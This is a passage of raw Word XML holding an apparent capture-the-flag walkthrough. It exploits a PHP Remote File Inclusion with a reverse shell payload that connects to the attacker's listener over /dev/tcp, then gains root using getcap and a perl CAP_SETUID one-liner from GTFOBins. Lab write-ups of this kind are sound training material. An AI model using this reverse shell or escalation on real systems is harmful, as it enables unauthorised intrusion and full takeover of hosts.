    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000040">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4064000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="75" name="image31.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image31.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId28"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="4064000"/>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Looking at the code, what catches my attention is that it performs an </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">include</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">on whatever is passed in the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">file </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">parameter. Therefore, we have an </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">RFI (Remote File Inclusion)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000042">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The next step is to host a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PHP </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">reverse shell on our Python server and then craft a request so that the application includes our file (in this case, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">shell.php</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">). It will interpret our payload and return a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">shell </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">=)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000043">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917700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="55" name="image4.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image4.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId29"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1917700"/>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45">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&lt;?php system("/bin/bash -c 'bash -i &gt;&amp; /dev/tcp/&lt;IP-VPN&gt;/4444 0&gt;&amp;1'"); ?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000046">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Python server to serve our payload.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000047">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336800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="52" name="image6.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image6.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId30"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2336800"/>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Netcat listener to receive the connection.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000049">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3479800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="73" name="image27.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image27.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId31"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3479800"/>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Now we send the request using </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Burp</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004B">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4267200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="76" name="image25.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image25.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId32"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="4267200"/>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Right after sending it, we receive the shell =)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004D">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908300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="68" name="image30.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image30.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId33"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2908300"/>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Navigating to the root directory → </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, we find our </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">third flag</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> =)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004F">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171700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="58" name="image21.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image21.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId34"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2171700"/>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pStyle w:val="Heading1"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:spacing w:before="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.dfr7w4k8irsn" w:id="5"/>
      <w:bookmarkEnd w:id="5"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Root</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000051">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400300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="57" name="image8.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image8.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId35"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2400300"/>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53">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getcap -r / 2&gt;/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000054">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Capabilities:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000055">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If a binary has the Linux capability set </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CAP_SETUID</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> or is executed by another binary with this capability set, it can be used as a backdoor to maintain privileged access by manipulating its own process </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">UID</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. In other words, we can change our user’s </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">UID </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">to 0, which is the root UID =)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000056">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57">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="80" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.p334x3pujspq" w:id="6"/>
      <w:bookmarkEnd w:id="6"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">perl | GTFOBins</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000058">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">It can be used to break out from restricted environments by spawning an interactive system shell. It can also send back a reverse shell to a listening attacker to open remote network access. Run </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nc -l -p 12345</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> on the attacker machine to receive the shell.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000059">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="10"/>
          <w:szCs w:val="10"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:hyperlink r:id="rId36">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://gtfobins.github.io/gtfobins/perl/#capabilities</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005A">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The next step is to execute the following command to set our UID to 0:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005B">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perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005C">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running the command, we become root, and now we can read the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">final flag</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005D">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044700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="59" name="image10.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image10.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId37"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2044700"/>
                    </a:xfrm>
